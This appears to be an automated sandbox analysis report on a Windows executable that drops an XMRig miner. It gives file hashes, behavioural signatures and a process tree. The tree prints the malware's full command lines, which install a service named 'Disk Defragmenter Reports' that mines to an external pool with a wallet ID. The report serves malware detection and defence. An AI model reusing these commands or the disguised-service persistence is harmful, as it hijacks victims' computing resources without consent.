Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2024 15:20
Static task
static1
Behavioral task
behavioral1
Sample
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Resource
win7-20240903-en
General
-
Target
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
-
Size
910KB
-
MD5
ca0fb79fde083ec2ba5625c6d1c208d8
-
SHA1
eb215b41f55ac1588d09354f5b1d32d5de92f248
-
SHA256
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229
-
SHA512
e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7
-
SSDEEP
12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7d-23.dat xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts irsetup.exe File created C:\Windows\System32\drivers\etc\hosts irsetup.exe -
Executes dropped EXE 5 IoCs
pid Process 1052 irsetup.exe 3916 svchost.exe 2936 svchost.exe 860 svchost.exe 1896 csrss.exe -
resource yara_rule behavioral2/files/0x000d000000023b6e-2.dat upx behavioral2/memory/1052-4-0x0000000000400000-0x0000000000527000-memory.dmp upx behavioral2/memory/1052-33-0x0000000000400000-0x0000000000527000-memory.dmp upx -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1392 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irsetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4116 PING.EXE 2256 PING.EXE 4932 PING.EXE -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2256 PING.EXE 4932 PING.EXE 4116 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeLockMemoryPrivilege 1896 csrss.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1052 irsetup.exe 1052 irsetup.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2296 wrote to memory of 1052 2296 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 83 PID 2296 wrote to memory of 1052 2296 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 83 PID 2296 wrote to memory of 1052 2296 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 83 PID 1052 wrote to memory of 4912 1052 irsetup.exe 84 PID 1052 wrote to memory of 4912 1052 irsetup.exe 84 PID 1052 wrote to memory of 4912 1052 irsetup.exe 84 PID 4912 wrote to memory of 3916 4912 cmd.exe 86 PID 4912 wrote to memory of 3916 4912 cmd.exe 86 PID 4912 wrote to memory of 2256 4912 cmd.exe 87 PID 4912 wrote to memory of 2256 4912 cmd.exe 87 PID 4912 wrote to memory of 2256 4912 cmd.exe 87 PID 4912 wrote to memory of 1392 4912 cmd.exe 92 PID 4912 wrote to memory of 1392 4912 cmd.exe 92 PID 4912 wrote to memory of 1392 4912 cmd.exe 92 PID 4912 wrote to memory of 4932 4912 cmd.exe 93 PID 4912 wrote to memory of 4932 4912 cmd.exe 93 PID 4912 wrote to memory of 4932 4912 cmd.exe 93 PID 4912 wrote to memory of 2936 4912 cmd.exe 96 PID 4912 wrote to memory of 2936 4912 cmd.exe 96 PID 860 wrote to memory of 1896 860 svchost.exe 99 PID 860 wrote to memory of 1896 860 svchost.exe 99 PID 4912 wrote to memory of 4116 4912 cmd.exe 103 PID 4912 wrote to memory of 4116 4912 cmd.exe 103 PID 4912 wrote to memory of 4116 4912 cmd.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe__IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Temp\run64.bat3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=504⤵
- Executes dropped EXE
PID:3916
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4932
-
-
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"4⤵
- Executes dropped EXE
PID:2936
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4116
-
-
-
-
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:860 -
C:\ProgramData\Temp\csrss.exe"C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=502⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
413KB
MD59fb6eb5b8e72e6671765a91f12f273fb
SHA1e476d2caaaf8506d8798cca874ab70f31a23a44f
SHA2569a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4
SHA5123e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed
-
Filesize
484B
MD539a4b61f3776e96201ff30b4f4a28afd
SHA1f293bfe02dd2b058330dce8a3ddab23ac5ea708d
SHA25627ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02
SHA512b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8
-
Filesize
345KB
MD51e706b1e8d3bd3764e3ee4bf5fe509d8
SHA1ba457bfcdc1b66609f142c3578be647c51d1356d
SHA25629f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74
SHA512f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924
-
Filesize
440KB
MD575ca7ff96bf5a316c3af2de6a412bd54
SHA10a093950790ff0dddff6f5f29c6b02c10997e0c5
SHA256d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1
SHA512b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4